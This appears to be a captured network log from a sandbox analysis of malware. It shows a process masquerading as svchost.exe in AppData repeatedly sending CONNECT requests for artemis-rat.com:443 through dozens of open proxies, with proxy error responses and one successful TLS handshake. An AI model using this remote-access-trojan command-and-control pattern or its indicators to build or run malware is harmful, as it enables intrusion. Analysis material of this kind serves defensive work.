Mar 9, 2024 13:14:30.000277042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2378	192.168.2.5	57590	47.74.152.29	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.002176046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.833230972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2379	192.168.2.5	57781	104.25.114.28	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.054327011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.208513021 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2380	192.168.2.5	56618	103.23.100.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.054490089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2381	192.168.2.5	56616	52.80.19.207	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.054512978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.879925013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880914927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.974251032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2382	192.168.2.5	57609	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.055172920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2383	192.168.2.5	57611	43.131.242.162	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.055886984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2384	192.168.2.5	56691	112.78.170.252	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.056875944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2385	192.168.2.5	57667	198.105.100.156	6407	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.056911945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.344242096 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2386	192.168.2.5	57614	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.057282925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2387	192.168.2.5	57643	144.76.96.180	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.057290077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.365627050 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2388	192.168.2.5	57528	103.153.154.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.057337999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.470474005 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2389	192.168.2.5	57776	104.16.109.207	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.058685064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.213365078 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2390	192.168.2.5	57831	23.227.38.230	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.059041023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.213505030 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2391	192.168.2.5	57584	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.059559107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.833453894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2392	192.168.2.5	57660	106.14.255.124	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.073225975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.405277014 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2393	192.168.2.5	57689	58.234.116.197	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.073348999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2394	192.168.2.5	57659	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.073610067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2395	192.168.2.5	57866	104.25.234.81	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.075963974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.230529070 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2396	192.168.2.5	57645	43.128.107.251	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.076349020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2397	192.168.2.5	57872	104.20.103.68	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.077914953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.232604980 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2398	192.168.2.5	57732	157.159.10.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.089641094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.742352009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.677279949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.535742044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117609024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2399	192.168.2.5	57734	119.196.168.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.092329979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2400	192.168.2.5	57870	204.236.176.61	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.095448017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.274084091 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:30.325967073 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a4 79 bb 6e bd 22 0d f0 16 11 f6 8c 4d de fc 81 51 53 8c 00 6b c9 59 c4 c6 b2 8b f3 71 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRyn"MQSkYq*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:30.499634027 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 8e f7 57 2d ad 27 0f 3a 21 29 c8 cd 29 13 d8 23 b8 e5 fb 37 31 b8 35 df 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9W-':!))#715DOWNGRD0000H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0H0";dJJH
